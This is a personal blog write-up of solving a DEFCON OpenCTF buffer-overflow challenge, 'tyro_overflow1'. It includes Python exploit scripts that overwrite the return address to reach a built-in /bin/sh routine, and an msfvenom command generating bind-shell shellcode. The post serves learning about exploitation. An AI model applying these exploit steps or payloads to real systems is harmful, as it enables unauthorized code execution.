Friday, August 26, 2016

"tyro" ... really?

The following falls somewhere between being an attempt to provide you with a useful guide on exploiting a vulnerable program, and therapy for me.  :-)

This year's DEFCON was, as usual, fantastic.  Since I've been working recently on trying to develop some offensive skills, I thought it would be fun to play around with the OpenCTF which was being held at DEFCON.  yeah, right.

I won't go much into the rest of the OpenCTF, other than to say it was fantastic and I highly recommend giving it a try.

After my team-mate, Ron, and I had dispatched with all the low hanging fruit we could find, we turned our attention to what seemed like the main attraction to the first level in the game - a series of services over the network.  They were named "tyro_" and then some type of vulnerability.  For example, "tyro_heap" or "tyro_infoleak1".  Tyro - noun: a beginner or novice. Perfect, some nice warmups before we get to the real challenges.

What made these challenges especially appealing was that you could download the program providing the "service".  This means that you could transfer it to your own machine, load it up into a debugger and plumb its secrets utilizing whatever 31337 forensics and reverse engineering tools you have at your disposal.  Cool, what could go wrong with that?  My DEFCON Black Badge was within grasp.

Like every self-respecting DEFCON attendee, I had built a special laptop to take to DEFCON.  In order to be prepared for whatever DEFCON threw my way, I had loaded it with several different virtual machines.  Far and away the most important tool I loaded on my machine was a spanking clean, brand new VM running Kali.  And since bigger and newer is better, it was the 64 bit, rolling update, distribution of Kali. No running out of virtual memory for this hacker.  :-)

That turned out to be my undoing.

So when Ron and I started playing with the "tyro" challenges on my laptop, we hit a bit of a snag.  Although they were certainly Linux executable binaries, they all would not run.  Turns out that the 64 bit Kali distribution I had didn't have the right libraries to run these particular 32 bit binaries.  Ouch!

Rather than wax eloquent on the sequence of wrong turns and wasted time that followed I'll just state:
  • Several other folks at the CTF managed to overcome this problem.  But despite helpful suggestions from others I never figured out how to get that Kali image to run these challenges.  Although I could be wrong, I think the way that the rolling update is configured, combined with my ignorance, prevented these helpful suggestions from working. I'm sure there was a way to get it working, I just couldn't figure it out.
  • In any other situation, my solution would have been to download the 32 bit Kali image and use that.  But the "safe" DEFCON network was too slow (e.g. 12+ hours to download the ISO), I wasn't willing to try the "unsafe" network, and any other options I had were even slower.
I ended up eventually moving on to other things at DEFCON, and I brought home some challenges to play with at my leisure.
__________________________________________________________

Several weeks after DEFCON I finally had some time to play with one of the "tyro" challenges, "tyro_overflow1".  In hopes of helping others avoid my mistakes, here's a description of how I managed to "figure out this challenge.


When you run the executable (on the 32-bit Kali distribution) the program prints it's name and then prompts you for input, "Can you trigger the success function?".  If you type in some short string, it says "Got ", followed by your input, an exclamation point, and then exits.


hmmm, this is "tyro_overflow" ... what are the chances that by providing a long input string I can overflow some buffer and find a vulnerability?


Well, that's interesting.  If the input is too long, the program crashes.  Let's pursue this in more detail.  To the debugger!

If it's not already clear, I'm still a beginner at the offensive side of security.  So far the only Linux debugger I've had any experience with is "edb" (Evan's Debugger).   To start edb with the challenge program:

edb --run ./tyro_overflow1_0601e9d93a2ff84ae7a85dc199fa8233 

Once edb is up and had the challenge loaded, we can start by running the challenge and seeing if we can reproduce the crash that we've discovered.

In edb, select "run" twice (from the "Debug" menu) to run the program (the first "run" will load the program and then pause it.)

Now is a good time to observe one of the nasties the creators of this challenge left for us.  When the challenge starts running, it sets an alarm which terminates the program after 30 seconds.  So once you start the program running you have 30 seconds to provide the input before it aborts.  Here's an example of that (using the Unix "time" function so you can see how long it takes to abort.)


When you start running the challenge, a simple window will pop up with the output from tyro_overflow. You can also provide input to the program in this window.

A natural first step is to reproduce our long string which crashed the program, and see if edb can help us figure out how to take advantage of this vulnerability.


YEEEHAW!!! You can see in the screen-shot above that when I provided the long strings of 'A's to the program, the debugger caught the resulting crash.

Here's what's really exciting about that crash ... the program crashed because it tried to execute code at an invalid address.  But look at the address it tried to execute, hex 41414141.  For those of you who haven't memorized the ASCII codes, hex 41 is the ASCII code for 'A'!

What we're seeing is that somehow, 4 of the 'A's that I fed the program got used as an address for it to go to.  That means that by adjusting my input I can make the program go to any address I want!  (Ignoring the possibility that my input may get munged somehow.)  Talk about raw power! This discovery is the key to compromising this program.  Everything from here on is just building on my ability to force the program to goto an address I specify.

At this point in my investigation, I manged to snatch defeat from the jaws of victory.  But it might be interesting anyway, and it's therapeutic for me, so I'll describe the path I took to finally understanding this challenge.

Based on what I've been studying recently, the 'conventional' path that one takes when exploiting a buffer overflow like this goes along the lines of:
  • Identify where in the input we're actually providing the address to goto.
  • Figure out how to provide some malicious code for the compromised program to run.  This is typically the "shell code" that we often embed in the overly long input. 
  • Figure out how to make the program execute the shell code.  This can be tricky because you usually don't know ahead of time what address your shell code is going to end up at.  If it always ended up at the same address, you could just use your control of where the computer goes, to go to your shell code.

Once I came down from the adrenaline high of controlling where the program goes, I began to address the question of which one of the many 'A' that I typed are actually the ones which control where the program goes.  Kali includes a really neat Metasploit tool for doing this.  Behold!


The tool pattern_create creates a string which has the property that any two character string occurs only once.  In the command above, I created a 200 character string.  When I reran the challenge under edb, and pasted this special string into the input windows, the program crashed again - but this time at a different address which came from the input string.


(BTW, you can paste into the window that edb provides by using the middle mouse button. On most mice, this is done by pushing down on the scroll wheel.)

The address it crashed at, hex 37654136, came from 4 characters in the input string.  The companion program to pattern_create, pattern_offset, will tell me where in the input string these 4 characters are. (Yes, I could do this by hand, but I have a computer to do it for me)

So now I've found that it's the 4 characters starting at 140 characters into the input string which control where the program goes.  Just to double check, let's create a prototype exploit program and prove that we know how to control where the challenge program goes.
___________________________________
#!/usr/bin/python

# Test program to verify that we can make
# tyro_overflow go to an address we specify

padding1 = 'A' * 140   # pad out to 140

jmpAddr = 'BBBB'       # where we say to goto

padding2 = 'C' * 100   # just to make sure input is big

exploitString = padding1 + jmpAddr + padding2

print exploitString
 ___________________________________

When we run our new program, we get the following output:


When we paste the string from our new program into tyro_overflow, we get the following crash:


which shows that our exploit was able to make tyro_overflow goto the address Hex 42424242 (which is the ASCII for 'BBBB' that we used as the address.)

Up to this point, everything I've done can be used for the working exploit (although as I'll point out later, some of it was unnecessary.)

However, from here I went down the wrong path.  Eventually I had back up and try a different route.  Nobody every said this stuff was easy!  I'll briefly show what I did anyway, it's interesting and under some circumstances it would have been correct.

At this point, I started to look at what the state of the various system registers during the crash.
  • You can see the current value of a register by double-clicking on it (the registers are in the upper right of the display.)
  • If you right-click in the "Data Dump" area, you can select "Goto Address" to make the Data Dump area show you the contents of memory at a specific address.

Using these tools, I discovered that the "ESP" register (aka the extended stack pointer) was pointing to the next character in in my input string after the "address" of BBBB.  This is fantastic!  This means that right after I put the address to goto, I can load up my input string with shell code with no size restrictions (if I had to use the string before the address, it probably would be limited to 140 bytes of shell code which might have been tight.)

I won't go into detail on how to produce the shell code, but if you're interested, I generated it with another Metasploit tool ....

 msfvenom -p 'linux/x86/shell_bind_tcp' LPORT=31337 -n 20 -e x86/alpha_mixed -f python

This produced a string I could include in a python program. The string corresponded to shell code which would have started a shell on the system and listened for connections on port 31337.  But as I mentioned above, this turned out to be the wrong approach to compromising this application.

The final step necessary to complete this compromise would have been to find some pre-existing code that I could direct the computer to which would in turn execute my shell code.

Keep in mind, I've discovered that the ESP register is now pointing directly to my shell code.  All I need to do is find code already in place which will reliably jump to the address in ESP.

And this is where my world came apart.  In the "Plugins" menu, edp has an "OpcodeSearcher" tool which will search for specific instructions in memory.  This tool is intended for just this type of use, and using it I found numerous 'jmp ESP' instructions (search for "ESP -> EIP") However, none of the ones I tried stayed in the same memory location between program runs.  This made it impossible for me to reliably find a way to jump to my shell code.  There may be a bit of code somewhere that would have worked, but I hadn't found it when I decided to try other approaches. 

Here is where I got back on the right path ... almost!

While I was using edb to look at the input string in the Data Dump window, I happened come across the place in memory where tyro_overflow stores the strings which is uses.



Notice that the string "/bin/sh" is there along with the other strings we've seen the program use.  Wow! Where does the program use this string? Does it already have "shell code", just waiting for me to jump to?  Could this be what the message "Can you trigger the success function" refer to?

I'll tell you now, the answer to the last 2 questions is yes and yes. :-)

So here's the final trick which eluded me until I looked up somebody else's solution to this challenge.

Looking in the data dump, we can see that the string '/bin/sh' resides in memory starting at address Hex 08048700.  Any code in the program which uses this string must somehow refer to this memory address when it invokes /bin/sh.  So I spent a fair amount of time using the edb Reference Searcher plugin trying to find code which referred to this memory location.  When that didn't pan out, I tried using the Binary Searcher to search for any part of the program which had this memory address in it.  No dice.

What was I doing wrong?  This had to be the right approach!

Finally, I looked a somebody else's (Blast Hardcheese) solution - and it all became clear.

The mistake I made was that when I searched for 08048700, i.e. the address of the string '/bin/sh', I didn't take into account that on Intel x86 computers, addresses are stored in 'little endian' format.  This means that the actual bytes in memory are stored in opposite order than we read them.  Instead of searching for 08048700, I should have searched for 00870408.  If I had, I would have found the following little snippet of code:


You can see in the 4th line that the address of the string '/bin/sh' (08048700) is loaded into the stack and then some subroutine is called.  That's enough to show that this is the routine we need to call.

Remember, we know that the program will go to whatever address starts at the 140th character in our input string.  So if we put Hex 0804858d (which is where the code above starts) in the input string there, we'll end up running the code which uses '/bin/sh'.  WoooHoooo!

One last detail remains, which is to discover by trial and error that this routine actually reads a command from the user input to execute when it calls /bin/sh.

Although not critical to success, I also discovered that there is no need for the input string to extend beyond the address to goto.  So it only needs to be 144 characters long.

So here's the essence of the exploit:
  • Overly long input will cause the program to read 4 bytes starting at the 140th character in the input and goto that address. BTW, those 4 bytes need to be in little endian format.  :-)
  • At Hex 0804858d is a routine which will read the next line of input, and execute that command in /bin/sh
  • So we provide an input string which has the hex value 0804858d starting at the 140th character.
  • On the next line, provide a command to execute
Here's the final exploit:
___________________________________
#!/usr/bin/python

# exploit a buffer overflow in the OpenCTF challenge, tyro_overflow

padding = ('A' * 140)  # Overflow the input with 140 characters

jmpAddr = '\x8d\x85\x04\x08'  # 0x0804858d in little endian format

exploitString = padding + jmpAddr

print exploitString

print "uname -a"   # just a command to show it worked
___________________________________

And here it is in action:



Here's the other writeup which helped me figure out what I was missing:

https://ctftime.org/writeup/3643